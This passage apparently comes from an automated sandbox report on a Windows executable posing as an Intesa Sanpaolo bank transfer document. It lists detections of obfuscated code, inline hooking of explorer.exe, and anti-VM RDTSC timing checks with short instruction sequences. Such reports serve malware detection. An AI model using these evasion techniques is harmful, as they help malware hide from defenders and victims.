          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, VugkCMjxUJUiqN9Ekd.csHigh entropy of concatenated method names: 'YAXhqkMMKm', 'PSEhPGr6EG', 'Etgj89w140', 'IW4j9vxxLb', 'lr8hFW6AxZ', 'vfuhrWWa5C', 'qoBhm8fu4f', 'd0ihSQIexV', 'OrehiRLE8f', 'et1hRoOd4P'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, JAb5mcifBkCyPIWWAv.csHigh entropy of concatenated method names: 'wSmaUlrVd6', 'IRRaDKKvDs', 'krXYn6QEfh', 'zGJYWTbssx', 'N22Y09ACIf', 'CwCYNy94CT', 'p55YyVXgvP', 'S4VYo3eKX8', 'H1iYsYbk1X', 'tIwYluhuay'
          Source: 0.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.7650000.10.raw.unpack, D6vJMZRNi3eJN1nVKI.csHigh entropy of concatenated method names: 'M251G5sDV2', 'QkD1YtldVB', 'CvR1MFe9Ib', 'A8sMPxpcg6', 'jvqMzFrbYd', 'rg118xDIYG', 'v4t19cawbu', 'GCJ1kt8HJ6', 'PY31QGtt1X', 'y321fWPVnj'
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exeJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exeJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeFile created: \documento di bonifico bancario intesa sanpaola 20240613 eur23750.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe PID: 7532, type: MEMORYSTR
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE530774
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE52D8A4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE530774
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52D8A4
          Source: C:\Windows\SysWOW64\control.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2539904 second address: 253990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 2539B7E second address: 2539B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: 2580000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: 9920000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: 9C30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeMemory allocated: AC30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_00409AB0 rdtsc 6_2_00409AB0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6723Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2072Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4114Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5821Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 852Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeWindow / User API: threadDelayed 9841Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-13905
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exeAPI coverage: 2.1 %
